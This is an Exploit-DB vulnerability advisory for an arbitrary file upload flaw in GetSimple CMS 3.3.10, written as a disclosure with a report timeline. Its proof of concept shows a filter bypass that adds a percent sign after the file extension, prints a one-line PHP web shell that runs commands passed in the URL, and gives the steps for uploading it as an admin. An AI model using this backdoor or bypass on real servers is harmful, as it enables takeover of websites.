Getsimple CMS 3.3.10 - Arbitrary File Upload

EDB-ID:

40008

CVE:

N/A


Author:

s0nk3y

Type:

webapps


Platform:

PHP

Date:

2016-06-23


# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
# Google Dork: -
# Date: 23/06/2016
# Exploit Author: s0nk3y
# Vendor Homepage: http://get-simple.info/
# Category: webapps
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
# Version: 3.3.10
# Tested on: Ubuntu 16.04 / Mozilla Firefox
# Twitter: http://twitter.com/s0nk3y
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi

Description
========================

GetSimple CMS has been downloaded over 120,000 times (as of March 2013). 
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises 
the simplicity yet possible extensibility through plug-ins.

Vulnerability
========================

GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability 
which allows an attacker to upload a backdoor.

This vulnerability is that the application uses a blacklist and whitelist 
technique to compare the file against mime types and extensions.

Proof of Concept
========================

For exploiting this vulnerability we will create a file by adding the percent 
behind extension.
1. evil.php% <--- this is simple trick :)
<?php
// simple backdoor
system($_GET['cmd']);
?>
2. An attacker login to the admin page and uploading the backdoor
3. The uploaded file will be under the "/data/uploads/" folder

Report Timeline
========================
2016-06-23 : Vulnerability reported to vendor
2016-06-23 : Disclosure